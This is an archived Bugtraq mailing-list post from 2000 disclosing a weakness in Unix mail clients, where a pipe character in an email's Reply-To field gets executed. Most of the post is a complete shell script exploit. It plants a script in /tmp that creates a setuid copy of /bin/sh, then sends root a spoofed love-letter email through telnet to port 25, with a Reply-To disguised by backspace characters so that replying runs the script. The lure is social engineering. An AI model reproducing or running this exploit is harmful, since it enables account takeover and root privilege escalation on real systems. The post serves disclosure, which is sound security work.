linux, säkerhet

5684958 2000-11-05 21:56 +0000  /104 rader/ gregory duchemin <c3rb3r@HOTMAIL.COM>
Sänt av: joel@lysator.liu.se
Importerad: 2000-11-06  08:40  av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: c3rb3r@HOTMAIL.COM
Mottagare: Bugtraq (import) <13599>
Ärende: mail Reply-To field exploit
------------------------------------------------------------
From: gregory duchemin <c3rb3r@HOTMAIL.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <F282z4r02V5xm4iZrbU00009213@hotmail.com>

hi all,

because there are few people here that didn't seem to understand how
serious is the mail.local/mail/sendmail weakness i reported to
bugtraq few days ago (lack of imagination ? ) here is an exploit, not
technicaly impressive but just enough powerfull to deceive many
people around here and take over their account priviledge.  I persist
to claim that no | char should be allowed in any smtp/lmtp/mime
fields (even in contradiction with any rfc) because of the major
security vulnerability it introduce.  Note: It's NOT A BUG in mail,
sendmail or mail.local but a weakness caused by a bindly rfc
compliance.  I didn't try elm, mailx and others so feedback are
welcomed

payback here is victim account take over by spawning a setuid shell
in /tmp. (even root)

Solution: take care about the reply-to recipient real anatomy. :)

Cheers,

Gregory Duchemin



I LOVE YOU letter for Unix
==========================


#!/bin/sh
#
# I-Love-U.sh

# Exploit for | char in mail Reply-To field
# tested on linux Caldera (techno preview linux 2.4.0)
#

# Gregory Duchemin ( AKA C3rb3r )
# Security Consultant
#
# NEUROCOM CANADA
# 1001 bd Maisonneuve Ouest
# Montreal (Quebec) H3A 3C8 Canada
# c3rb3r@hotmail.com



# Cook Ingredients: one | char (hidden in an uppercase i),
# a bit of evil ^H to hide "/tmp/", and a girl to stimulate a reply ;)
#


cd /tmp
cat ^H^H^H^H^Hsabelle@hotmail.com << _End
#!/bin/sh
cp /bin/sh /tmp/newsh
chmod a+rws /tmp/newsh
_End


{
sleep 1
echo "HELO hotmail.com"
sleep 1
echo "MAIL FROM:<Isabelle@hotmail.com>"
sleep 1
echo "RCPT TO:<root>"
sleep 1
echo "DATA"
sleep 1

# Reply-to will appear as Reply-To:<|sabelle@hotmail.com>

echo "Reply-To:<|/tmp/^H^H^H^H^Hsabelle@hotmail.com>"
sleep 1
echo
echo "I saw you yesterday, since i'm a bit confused..i just wanted"
echo "to say you."
echo "I believe I LOVE YOU"
echo
echo "Isabelle."
echo "."
sleep 1
echo "QUIT"
sleep 2
}|telnet localhost 25

echo "Job is done...now check for newsh in /tmp"
echo
echo

_________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.

Share information about yourself, create your own public profile at
http://profiles.msn.com.
(5684958) --------------------------------(Ombruten)